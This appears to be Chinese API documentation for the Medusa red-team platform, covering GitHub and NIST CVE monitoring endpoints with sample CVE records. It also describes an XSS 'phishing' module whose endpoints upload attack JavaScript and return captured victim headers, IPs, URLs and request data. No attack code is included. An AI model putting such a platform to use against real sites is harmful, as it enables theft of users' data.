Medusa 红队武器库平台|协同|CVE监控|免杀生成|钓鱼邮件

Medusa 红队武器库平台|协同|CVE监控|免杀生成|钓鱼邮件

目录导航

GitHub监控详情

/api/github_monitor/GitHubCVE数查询接口

{
    "token": "xxx",
    "number_of_pages": "xxx",
}

参数解释

  • token登录后返回的token
  • number_of_pages页码数

返回状态码

  • 200:返回查询到的数据
{
    "message": {
        "amount": 351,
        "data": [{
            "github_id": "226311004",
            "name": "cve_feeds",
            "html_url": "https://github.com/AppThreat/cve_feeds",
            "created_at": "2019-12-06T11:07:01Z",
            "updated_at": "2021-01-04T08:21:49Z",
            "pushed_at": "2021-01-04T08:21:46Z",
            "forks_count": "6",
            "watchers_count": "7"
        }, {
            "github_id": "300791308",
            "name": "cvebase.com",
            "html_url": "https://github.com/cvebase/cvebase.com",
            "created_at": "2020-10-03T03:58:04Z",
            "updated_at": "2020-12-30T22:21:09Z",
            "pushed_at": "2020-12-30T22:21:10Z",
            "forks_count": "22",
            "watchers_count": "61"
        }, {
            "github_id": "306793101",
            "name": "CVE_REQUEST-apache",
            "html_url": "https://github.com/plr47/CVE_REQUEST-apache",
            "created_at": "2020-10-24T02:55:10Z",
            "updated_at": "2020-10-24T05:48:22Z",
            "pushed_at": "2020-10-24T05:48:20Z",
            "forks_count": "0",
            "watchers_count": "3"
        }, {
            "github_id": "223232536",
            "name": "php-version-audit",
            "html_url": "https://github.com/lightswitch05/php-version-audit",
            "created_at": "2019-11-21T17:54:51Z",
            "updated_at": "2021-01-04T05:18:57Z",
            "pushed_at": "2021-01-04T05:18:59Z",
            "forks_count": "14",
            "watchers_count": "79"
        }, {
            "github_id": "195458483",
            "name": "cvelist",
            "html_url": "https://github.com/vmcommunity/cvelist",
            "created_at": "2019-07-05T19:30:48Z",
            "updated_at": "2021-01-04T03:31:16Z",
            "pushed_at": "2021-01-04T03:31:13Z",
            "forks_count": "6",
            "watchers_count": "8"
        }]
    }
    "code": 200
}
  • 返回参数解释
    • amount所有个数数量
    • data详细数据,会有多个数组的集合
      • github_id任务ID
      • name目标连接
      • html_url项目连接
      • created_at项目创建时间
      • updated_at项目更新时间
      • pushed_at项目推送时间
      • forks_count项目fork数量
      • watchers_count项目star数量
  • 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 404:非法查询哦宝贝!
  • 500:请使用Post请求

GitHub监控数据搜索

/api/github_monitor_search/GitHub监控数据搜索

{
    "token": "xxx",
    "name": "xxx",
    "number_of_pages": "xxx"
}

参数解释

  • token登录后返回的token
  • name要搜索的项目名称
  • number_of_pages页码数

返回状态码

  • 200:返回查询到的数据
{
    "message": {
        "amount": 2,
        "data": [{
            "github_id": "349467219",
            "name": "CVEs",
            "html_url": "https://github.com/s1vona/CVEs",
            "created_at": "2021-03-19T15:20:24Z",
            "updated_at": "2021-05-10T13:53:20Z",
            "pushed_at": "2021-05-10T13:53:17Z",
            "forks_count": "0",
            "watchers_count": "0"
        }, {
            "github_id": "366957392",
            "name": "cves",
            "html_url": "https://github.com/sebaslavigne/cves",
            "created_at": "2021-05-13T06:36:10Z",
            "updated_at": "2021-07-27T23:15:47Z",
            "pushed_at": "2021-07-27T23:15:44Z",
            "forks_count": "0",
            "watchers_count": "0"
        }]
    },
    "code": 200
}

返回参数解释

  • amount所有个数数量
  • data详细数据,会有多个数组的集合
    • github_id任务ID
    • name目标连接
    • html_url项目连接
    • created_at项目创建时间
    • updated_at项目更新时间
    • pushed_at项目推送时间
    • forks_count项目fork数量
    • watchers_count项目star数量
  • 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 404:非法查询哦宝贝!
  • 500:请使用Post请求

监控首页精简数据查询

/api/nist_data_bulk_query/CVE监控首页精简数据查询

{
    "token": "xxx",
    "number_of_pages":"20"
}

参数解释

  • token登录后返回的token
  • number_of_pages页数,传入的值必须大于0

返回状态码

  • 200:返回查询到的数据(为了文档可观,只列出部分数据,正常数据为100条)
{
    "message": [{
        "vulnerability_number": "CVE-2003-0267",
        "v3_base_score": "",
        "v3_base_severity": "",
        "v2_base_score": "5.0",
        "v2_base_severity": "MEDIUM",
        "last_up_date": "2016-10-18",
        "vulnerability_description": "ShowGodLog.dll in SLWebMail 3 on Windows systems allows remote attackers to read arbitrary files by directly calling ShowGodLog.dll with an argument specifying the full path of the target file.",
        "vendors": "['Bvrp Software']",
        "products": "['Slwebmail']"
    }, {
        "vulnerability_number": "CVE-2003-0268",
        "v3_base_score": "",
        "v3_base_severity": "",
        "v2_base_score": "5.0",
        "v2_base_severity": "MEDIUM",
        "last_up_date": "2016-10-18",
        "vulnerability_description": "SLWebMail 3 on Windows systems allows remote attackers to identify the full path of the server via invalid requests to DLLs such as WebMailReq.dll, which reveals the path in an error message.",
        "vendors": "['Bvrp Software']",
        "products": "['Slwebmail']"
    }, {
        "vulnerability_number": "CVE-2003-0269",
        "v3_base_score": "",
        "v3_base_severity": "",
        "v2_base_score": "7.2",
        "v2_base_severity": "HIGH",
        "last_up_date": "2017-07-11",
        "vulnerability_description": "Buffer overflow in youbin allows local users to gain privileges via a long HOME environment variable.",
        "vendors": "['Youbin']",
        "products": "['Youbin']"
    }, {
        "vulnerability_number": "CVE-2003-0367",
        "v3_base_score": "",
        "v3_base_severity": "",
        "v2_base_score": "2.1",
        "v2_base_severity": "LOW",
        "last_up_date": "2019-05-23",
        "vulnerability_description": "znew in the gzip package allows local users to overwrite arbitrary files via a symlink attack on temporary files.",
        "vendors": "['Gnu', 'Debian']",
        "products": "['Gzip', 'Debian Linux']"
    }],
    "code": 200
}
  • 返回参数解释会有多个数组的集合
    • vulnerability_number漏洞编号
    • v3_base_scoreCVSS v3 分数
    • v3_base_severityCVSS v3 分级
    • v2_base_scoreCVSS v2 分数
    • v2_base_severityCVSS v2 分级
    • last_up_date最后更新时间
    • vulnerability_description漏洞说明
    • vendors开发商名称
    • products产品名称
  • 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求
  • 503:你家有小于0的页码?

单个CVE详情查询

/api/nist_data_detailed_query/获取单个详细的CVE编号

{
    "token": "xxx",
    "common_vulnerabilities_and_exposures":"CVE-2021-3177"
}

参数解释

  • token登录后返回的token
  • common_vulnerabilities_and_exposuresCVE编号

返回状态码

  • 200:返回查询到的数据,message中为需要用到的原始数据
{
    "message": "{'cve': {'data_type': 'CVE', 'data_format': 'MITRE', 'data_version': '4.0', 'CVE_data_meta': {'ID': 'CVE-2021-3177', 'ASSIGNER': '[email protected]'}, 'problemtype': {'problemtype_data': [{'description': [{'lang': 'en', 'value': 'CWE-120'}]}]}, 'references': {'reference_data': [{'url': 'https://bugs.python.org/issue42938', 'name': 'https://bugs.python.org/issue42938', 'refsource': 'MISC', 'tags': ['Exploit', 'Patch', 'Vendor Advisory']}, {'url': 'https://github.com/python/cpython/pull/24239', 'name': 'https://github.com/python/cpython/pull/24239', 'refsource': 'MISC', 'tags': ['Patch', 'Third Party Advisory']}, {'url': 'https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E', 'name': '[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar', 'refsource': 'MLIST', 'tags': []}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/BRHOCQYX3QLDGDQGTWQAUUT2GGIZCZUO/', 'name': 'FEDORA-2021-42ba9feb47', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/CCFZMVRQUKCBQIG5F2CBVADK63NFSE4A/', 'name': 'FEDORA-2021-ced31f3f0c', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/FONHJIOZOFD7CD35KZL6SVBUTMBPGZGA/', 'name': 'FEDORA-2021-907f3bacae', 'refsource': 'FEDORA', 'tags': []}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/FPE7SMXYUIWPOIZV4DQYXODRXMFX3C5E/', 'name': 'FEDORA-2021-d5cde50865', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/HCQTCSP6SCVIYNIRUJC5X7YBVUHPLSC4/', 'name': 'FEDORA-2021-7547ad987f', 'refsource': 'FEDORA', 'tags': ['Mailing List', 'Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/MGSV6BJQLRQ6RKVUXK7JGU7TP4QFGQXC/', 'name': 'FEDORA-2021-faf88b9499', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/MP572OLHMS7MZO4KUPSCIMSZIA5IZZ62/', 'name': 'FEDORA-2021-3352c1c802', 'refsource': 'FEDORA', 'tags': ['Mailing List', 'Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/NODWHDIFBQE5RU5PUWUVE47JOT5VCMJ2/', 'name': 'FEDORA-2021-f4fd9372c7', 'refsource': 'FEDORA', 'tags': ['Mailing List', 'Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/NQPARTLNSFQVMMQHPNBFOCOZOO3TMQNA/', 'name': 'FEDORA-2021-cc3ff94cfc', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/NXSMBHES3ANXXS2RSO5G6Q24BR4B2PWK/', 'name': 'FEDORA-2021-076a2dccba', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/V6XJAULOS5JVB2L67NCKKMJ5NTKZJBSD/', 'name': 'FEDORA-2021-851c6e4e2d', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/Y4KSYYWMGAKOA2JVCQA422OINT6CKQ7O/', 'name': 'FEDORA-2021-17668e344a', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/YDTZVGSXQ7HR7OCGSUHTRNTMBG43OMKU/', 'name': 'FEDORA-2021-66547ff92d', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/Z7GZV74KM72O2PEJN2C4XP3V5Q5MZUOO/', 'name': 'FEDORA-2021-e3a5a74610', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://news.ycombinator.com/item?id=26185005', 'name': 'https://news.ycombinator.com/item?id=26185005', 'refsource': 'MISC', 'tags': ['Third Party Advisory']}, {'url': 'https://python-security.readthedocs.io/vuln/ctypes-buffer-overflow-pycarg_repr.html', 'name': 'https://python-security.readthedocs.io/vuln/ctypes-buffer-overflow-pycarg_repr.html', 'refsource': 'MISC', 'tags': ['Patch', 'Third Party Advisory']}, {'url': 'https://security.gentoo.org/glsa/202101-18', 'name': 'GLSA-202101-18', 'refsource': 'GENTOO', 'tags': ['Third Party Advisory']}, {'url': 'https://security.netapp.com/advisory/ntap-20210226-0003/', 'name': 'https://security.netapp.com/advisory/ntap-20210226-0003/', 'refsource': 'CONFIRM', 'tags': []}]}, 'description': {'description_data': [{'lang': 'en', 'value': 'Python 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input, as demonstrated by a 1e300 argument to c_double.from_param. This occurs because sprintf is used unsafely.'}]}}, 'configurations': {'CVE_data_version': '4.0', 'nodes': [{'operator': 'OR', 'cpe_match': [{'vulnerable': True, 'cpe23Uri': 'cpe:2.3:a:python:python:*:*:*:*:*:*:*:*', 'versionStartIncluding': '3.6.0', 'versionEndIncluding': '3.6.12'}, {'vulnerable': True, 'cpe23Uri': 'cpe:2.3:a:python:python:*:*:*:*:*:*:*:*', 'versionStartIncluding': '3.7.0', 'versionEndIncluding': '3.7.9'}, {'vulnerable': True, 'cpe23Uri': 'cpe:2.3:a:python:python:*:*:*:*:*:*:*:*', 'versionStartIncluding': '3.8.0', 'versionEndIncluding': '3.8.7'}, {'vulnerable': True, 'cpe23Uri': 'cpe:2.3:a:python:python:*:*:*:*:*:*:*:*', 'versionStartIncluding': '3.9.0', 'versionEndIncluding': '3.9.1'}]}, {'operator': 'OR', 'cpe_match': [{'vulnerable': True, 'cpe23Uri': 'cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*'}, {'vulnerable': True, 'cpe23Uri': 'cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*'}]}]}, 'impact': {'baseMetricV3': {'cvssV3': {'version': '3.1', 'vectorString': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H', 'attackVector': 'NETWORK', 'attackComplexity': 'LOW', 'privilegesRequired': 'NONE', 'userInteraction': 'NONE', 'scope': 'UNCHANGED', 'confidentialityImpact': 'HIGH', 'integrityImpact': 'HIGH', 'availabilityImpact': 'HIGH', 'baseScore': 9.8, 'baseSeverity': 'CRITICAL'}, 'exploitabilityScore': 3.9, 'impactScore': 5.9}, 'baseMetricV2': {'cvssV2': {'version': '2.0', 'vectorString': 'AV:N/AC:L/Au:N/C:P/I:P/A:P', 'accessVector': 'NETWORK', 'accessComplexity': 'LOW', 'authentication': 'NONE', 'confidentialityImpact': 'PARTIAL', 'integrityImpact': 'PARTIAL', 'availabilityImpact': 'PARTIAL', 'baseScore': 7.5}, 'severity': 'HIGH', 'exploitabilityScore': 10.0, 'impactScore': 6.4, 'acInsufInfo': False, 'obtainAllPrivilege': False, 'obtainUserPrivilege': False, 'obtainOtherPrivilege': False, 'userInteractionRequired': False}}, 'publishedDate': '2021-01-19T06:15Z', 'lastModifiedDate': '2021-02-26T09:15Z'}",
    "code": 200
}
  • 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求

CVE编号数据个数统计

/api/nist_statistics/获取CVE编号数据个数

{
    "token": "xxx"
}

参数解释

  • token登录后返回的token

返回状态码

  • 200:返回查询到的数据,为漏洞个数{"message": 76534, "code": 200}
  • 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求

严重性筛选查询

/api/nist_severity_filter/对于严重性等级筛选

{
    "token": "xxx",
    "number_of_pages":"0",
    "severity":"xxxx"
}

参数解释

  • token登录后返回的token
  • number_of_pages页数,传入的值必须大于0
  • severity严重性等级,可传入参数:NONE、LOW、MEDIUM、HIGH、CRITICAL

返回状态码

  • 200:返回查询到的数据(为了文档可观,只列出部分数据,正常数据为100条)
{
    "message": {
        "total": 2588,
        "data": [{
            "vulnerability_number": "CVE-2021-0109",
            "v3_base_score": "7.8",
            "v3_base_severity": "HIGH",
            "v2_base_score": "4.6",
            "v2_base_severity": "MEDIUM",
            "last_up_date": "2021-02-22",
            "vulnerability_description": "Insecure inherited permissions for the Intel(R) SOC driver package for STK1A32SC before version 604 may allow an authenticated user to potentially enable escalation of privilege via local access.",
            "vendors": "",
            "products": ""
        }, {
            "vulnerability_number": "CVE-2021-0202",
            "v3_base_score": "7.5",
            "v3_base_severity": "HIGH",
            "v2_base_score": "5.0",
            "v2_base_severity": "MEDIUM",
            "last_up_date": "2021-01-21",
            "vulnerability_description": "On Juniper Networks MX Series and EX9200 Series platforms with Trio-based MPC (Modular Port Concentrator) where Integrated Routing and Bridging (IRB) interface is configured and it is mapped to a VPLS instance or a Bridge-Domain, certain network events at Customer Edge (CE) device may cause memory leak in the MPC which can cause an out of memory and MPC restarts. When this issue occurs, there will be temporary traffic interruption until the MPC is restored. An administrator can use the following CLI command to monitor the status of memory usage level of the MPC: user@device> show system resource-monitor fpc FPC Resource Usage Summary Free Heap Mem Watermark : 20 % Free NH Mem Watermark : 20 % Free Filter Mem Watermark : 20 % * - Watermark reached Slot # % Heap Free RTT Average RTT 1 87 PFE # % ENCAP mem Free % NH mem Free % FW mem Free 0 NA 88 99 1 NA 89 99 When the issue is occurring, the value of \u201c% NH mem Free\u201d will go down until the MPC restarts. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX Series, EX9200 Series: 17.3R3-S8; 17.4R3-S2; 18.2R3-S4, 18.2R3-S5; 18.3R3-S2, 18.3R3-S3; 18.4 versions starting from 18.4R3-S1 and later versions prior to 18.4R3-S6; 19.2 versions starting from 19.2R2 and later versions prior to 19.2R3-S1; 19.4 versions starting from 19.4R2 and later versions prior to 19.4R2-S3, 19.4R3; 20.2 versions starting from 20.2R1 and later versions prior to 20.2R1-S3, 20.2R2. This issue does not affect Juniper Networks Junos OS: 18.1, 19.1, 19.3, 20.1.",
            "vendors": "",
            "products": ""
        }, {
            "vulnerability_number": "CVE-2021-0208",
            "v3_base_score": "8.8",
            "v3_base_severity": "HIGH",
            "v2_base_score": "3.3",
            "v2_base_severity": "LOW",
            "last_up_date": "2021-01-21",
            "vulnerability_description": "An improper input validation vulnerability in the Routing Protocol Daemon (RPD) service of Juniper Networks Junos OS allows an attacker to send a malformed RSVP packet when bidirectional LSPs are in use, which when received by an egress router crashes the RPD causing a Denial of Service (DoS) condition. Continued receipt of the packet will sustain the Denial of Service. This issue affects: Juniper Networks Junos OS: All versions prior to 17.3R3-S10 except 15.1X49-D240 for SRX series; 17.4 versions prior to 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S4; 18.3 versions prior to 18.3R3-S2; 18.4 versions prior to 18.4R1-S8, 18.4R2-S6, 18.4R3-S2; 19.1 versions prior to 19.1R1-S5, 19.1R3-S3; 19.2 versions prior to 19.2R3; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R2-S2, 19.4R3-S1; 20.1 versions prior to 20.1R1-S4, 20.1R2; 15.1X49 versions prior to 15.1X49-D240 on SRX Series. Juniper Networks Junos OS Evolved: 19.3 versions prior to 19.3R2-S5-EVO; 19.4 versions prior to 19.4R2-S2-EVO; 20.1 versions prior to 20.1R1-S4-EVO.",
            "vendors": "",
            "products": ""
        }, {
            "vulnerability_number": "CVE-2021-1195",
            "v3_base_score": "7.2",
            "v3_base_severity": "HIGH",
            "v2_base_score": "9.0",
            "v2_base_severity": "HIGH",
            "last_up_date": "2021-01-15",
            "vulnerability_description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.",
            "vendors": "",
            "products": ""
        }]
    },
    "code": 200
}
  • 返回参数解释
    • total该等级的漏洞个数
    • data里面存在当前页面100个数据,数据参数解释如下
      • vulnerability_number漏洞编号
      • v3_base_scoreCVSS v3 分数
      • v3_base_severityCVSS v3 分级
      • v2_base_scoreCVSS v2 分数
      • v2_base_severityCVSS v2 分级
      • last_up_date最后更新时间
      • vulnerability_description漏洞说明
      • vendors开发商名称
      • products产品名称
  • 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求
  • 503:你家有小于0的页码?

厂商名称筛选查询

/api/nist_vendors_filter/对于严重性等级筛选

{
    "token": "xxx",
    "number_of_pages":"0",
    "vendors":"xxxx"
}

参数解释

  • token登录后返回的token
  • number_of_pages页数,传入的值必须大于0
  • vendors厂商名称

返回状态码

  • 200:返回查询到的数据(为了文档可观,只列出部分数据,正常数据为100条)
{
    "message": {
        "total": 1673,
        "data": [{
            "vulnerability_number": "CVE-2021-0301",
            "v3_base_score": "6.7",
            "v3_base_severity": "MEDIUM",
            "v2_base_score": "4.6",
            "v2_base_severity": "MEDIUM",
            "last_up_date": "2021-01-13",
            "vulnerability_description": "In ged, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android SoC; Android ID: A-172514667.",
            "vendors": "['Google']",
            "products": "['Android']"
        }, {
            "vulnerability_number": "CVE-2021-0302",
            "v3_base_score": "7.8",
            "v3_base_severity": "HIGH",
            "v2_base_score": "9.3",
            "v2_base_severity": "HIGH",
            "last_up_date": "2021-02-12",
            "vulnerability_description": "In PackageInstaller, there is a possible tapjacking attack due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10Android ID: A-155287782",
            "vendors": "['Google']",
            "products": "['Android']"
        }, {
            "vulnerability_number": "CVE-2021-0303",
            "v3_base_score": "7.0",
            "v3_base_severity": "HIGH",
            "v2_base_score": "6.9",
            "v2_base_severity": "MEDIUM",
            "last_up_date": "2021-01-13",
            "vulnerability_description": "In dispatchGraphTerminationMessage() of packages/services/Car/computepipe/runner/graph/StreamSetObserver.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Android ID: A-170407229.",
            "vendors": "['Google']",
            "products": "['Android']"
        }, {
            "vulnerability_number": "CVE-2021-21146",
            "v3_base_score": "9.6",
            "v3_base_severity": "CRITICAL",
            "v2_base_score": "6.8",
            "v2_base_severity": "MEDIUM",
            "last_up_date": "2021-02-18",
            "vulnerability_description": "Use after free in Navigation in Google Chrome prior to 88.0.4324.146 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.",
            "vendors": "['Google', 'Fedoraproject']",
            "products": "['Chrome', 'Fedora']"
        }]
    },
    "code": 200
}
  • 返回参数解释
    • total该等级的漏洞个数
    • data里面存在当前页面100个数据,数据参数解释如下
      • vulnerability_number漏洞编号
      • v3_base_scoreCVSS v3 分数
      • v3_base_severityCVSS v3 分级
      • v2_base_scoreCVSS v2 分数
      • v2_base_severityCVSS v2 分级
      • last_up_date最后更新时间
      • vulnerability_description漏洞说明
      • vendors开发商名称
      • products产品名称
  • 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求
  • 503:你家有小于0的页码?

产品名称筛选查询

/api/nist_products_filter/对于严重性等级筛选

{
    "token": "xxx",
    "number_of_pages":"0",
    "products":"xxxx"
}

参数解释

  • token登录后返回的token
  • number_of_pages页数,传入的值必须大于0
  • products产品名称

返回状态码

  • 200:返回查询到的数据(为了文档可观,只列出部分数据,正常数据为100条)
{
    "message": {
        "total": 82,
        "data": [{
            "vulnerability_number": "CVE-2021-0204",
            "v3_base_score": "7.8",
            "v3_base_severity": "HIGH",
            "v2_base_score": "7.2",
            "v2_base_severity": "HIGH",
            "last_up_date": "2021-01-21",
            "vulnerability_description": "A sensitive information disclosure vulnerability in delta-export configuration utility (dexp) of Juniper Networks Junos OS may allow a locally authenticated shell user the ability to create and read database files generated by the dexp utility, including password hashes of local users. Since dexp is shipped with setuid permissions enabled and is owned by the root user, this vulnerability may allow a local privileged user the ability to run dexp with root privileges and access sensitive information in the dexp database. This issue affects Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S8; 15.1X49 versions prior to 15.1X49-D230; 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D34; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S7, 18.4R3-S6; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3-S1; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3-S1; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S2, 20.2R2.",
            "vendors": "['Juniper']",
            "products": "['Junos']"
        },{
            "vulnerability_number": "CVE-2015-7751",
            "v3_base_score": "",
            "v3_base_severity": "",
            "v2_base_score": "6.9",
            "v2_base_severity": "MEDIUM",
            "last_up_date": "2015-10-20",
            "vulnerability_description": "Juniper Junos OS before 12.1X44-D50, 12.1X46 before 12.1X46-D35, 12.1X47 before 12.1X47-D25, 12.3 before 12.3R9, 12.3X48 before 12.3X48-D15, 13.2 before 13.2R7, 13.2X51 before 13.2X51-D35, 13.3 before 13.3R6, 14.1 before 14.1R5, 14.1X50 before 14.1X50-D105, 14.1X51 before 14.1X51-D70, 14.1X53 before 14.1X53-D25, 14.1X55 before 14.1X55-D20, 14.2 before 14.2R1, 15.1 before 15.1F2 or 15.1R1, and 15.1X49 before 15.1X49-D10 does not require a password for the root user when pam.conf is \"corrupted,\" which allows local users to gain root privileges by modifying the file.",
            "vendors": "['Juniper']",
            "products": "['Junos']"
        }, {
            "vulnerability_number": "CVE-2015-7752",
            "v3_base_score": "",
            "v3_base_severity": "",
            "v2_base_score": "7.8",
            "v2_base_severity": "HIGH",
            "last_up_date": "2015-10-20",
            "vulnerability_description": "The SSH server in Juniper Junos OS before 12.1X44-D50, 12.1X46 before 12.1X46-D35, 12.1X47 before 12.1X47-D25, 12.3 before 12.3R10, 12.3X48 before 12.3X48-D10, 13.2 before 13.2R8, 13.2X51 before 13.2X51-D35, 13.3 before 13.3R6, 14.1 before 14.1R5, 14.1X53 before 14.1X53-D25, 14.2 before 14.2R3, 15.1 before 15.1R1, and 15.1X49 before 15.1X49-D20 allows remote attackers to cause a denial of service (CPU consumption) via unspecified SSH traffic.",
            "vendors": "['Juniper']",
            "products": "['Junos']"
        }]
    },
    "code": 200
}
  • 返回参数解释会有多个数组的集合
    • total该等级的漏洞个数
    • data里面存在当前页面100个数据,数据参数解释如下
      • vulnerability_number漏洞编号
      • v3_base_scoreCVSS v3 分数
      • v3_base_severityCVSS v3 分级
      • v2_base_scoreCVSS v2 分数
      • v2_base_severityCVSS v2 分级
      • last_up_date最后更新时间
      • vulnerability_description漏洞说明
      • vendors开发商名称
      • products产品名称
  • 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求
  • 503:你家有小于0的页码?

XSS平台

创建跨站脚本钓鱼项目

/api/create_cross_site_script_project/用来创建跨站脚本项目

{
    "token": "",
    "project_name":"",
    "javascript_data":""
}

参数解释

  • token登录后返回的token
  • project_name该项目的项目名
  • javascript_data进行过base64加密后的JS文件数据

返回状态码

  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
  • 200:创建后本地生成的js文件
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求

修改跨站脚本钓鱼项目

/api/modify_cross_site_script_project/用来修改跨站脚本项目

{
    "token": "",
    "project_associated_file_name":"",
    "project_associated_file_data":""
}

参数解释

  • token登录后返回的token
  • project_associated_file_name该项目生成的文件名
  • project_associated_file_data需要对文件修改的数据,需要进行base64加密后传入

返回状态码

  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
  • 200:文件内容覆盖成功~
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 404:你没有查询这个项目的权限哦宝贝~
  • 500:请使用Post请求

查询跨站脚本钓鱼项目

/api/query_cross_site_script_project/用来查询用户的跨站脚本项目

{
    "token": "",
}

参数解释

  • token登录后返回的token

返回状态码

  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
  • 200:返回查询到的项目信息
{
    "message": [{
        "project_name": "123123",
        "file_name": "HXKZM",
        "creation_time": "1608208943"
    }, {
        "project_name": "test",
        "file_name": "Ks1ZM",
        "creation_time": "1628208943"
    }],
    "code": 200
}
  • 返回参数解释会有多个数组的集合
    • project_name项目名称
    • file_name文件名称
    • creation_time创建时间
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求

查询跨站脚本钓鱼项目中数据

/api/query_cross_site_script_project_data/用来查询用户的跨站脚本项目中的数据信息

{
    "token": "",
    "project_associated_file_name":""
}

参数解释

  • token登录后返回的token
  • project_associated_file_name项目中生成的特殊文件名,也就是/api/query_cross_site_scripting_project/接口传回的file_name数据

返回状态码

  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
  • 200:返回查询到的项目信息
{
    "message": [{
        "project_name": "123123",
        "file_name": "HXKZM",
        "creation_time": "1608208943"
    }, {
        "project_name": "test",
        "file_name": "Ks1ZM",
        "creation_time": "1628208943"
    }],
    "code": 200
}
  • 返回参数解释会有多个数组的集合
    • headers受害者请求头数据,需要base64解密
    • project_associated_file_name文件名称
    • ip受害者IP
    • full_url受害者请求完整路径
    • creation_time受害者请求连接
    • request_method请求方式
    • data_pack请求数据包,需要base64解密
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 404:你没有查询这个项目的权限哦宝贝~
  • 500:请使用Post请求

查询跨站脚本钓鱼项目详细信息

/api/query_cross_site_script_project_info/用来查询用户的跨站脚本项目的详细信息

{
    "token": "",
    "project_associated_file_name":""
}

参数解释

  • token登录后返回的token
  • project_associated_file_name创建项目是生成的文件,创建项目时会返回

返回状态码

  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
